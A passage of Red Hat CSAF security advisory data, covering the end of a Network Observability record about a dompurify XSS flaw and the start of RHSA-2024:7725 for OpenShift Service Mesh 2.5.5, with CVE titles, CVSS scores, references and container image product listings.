"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dompurify: XSS vulnerability via prototype pollution"
}
]
}
RHSA-2024:7725
Vulnerability from csaf_redhat - Published: 2024-10-07 09:24 - Updated: 2025-11-21 19:13Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.5.5
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* envoy: abnormal termination when using auto_sni with authority header longer
than 255 characters (CVE-2024-32475)
* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.5.5\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* envoy: abnormal termination when using auto_sni with authority header longer\nthan 255 characters (CVE-2024-32475)\n* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7725",
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2259228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259228"
},
{
"category": "external",
"summary": "2272986",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272986"
},
{
"category": "external",
"summary": "2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5",
"tracking": {
"current_release_date": "2025-11-21T19:13:59+00:00",
"generator": {
"date": "2025-11-21T19:13:59+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:7725",
"initial_release_date": "2024-10-07T09:24:53+00:00",
"revision_history": [
{
"date": "2024-10-07T09:24:53+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:24:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:13:59+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.5 for RHEL 8",
"product": {
"name": "RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.5::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"product_identification_helper": {
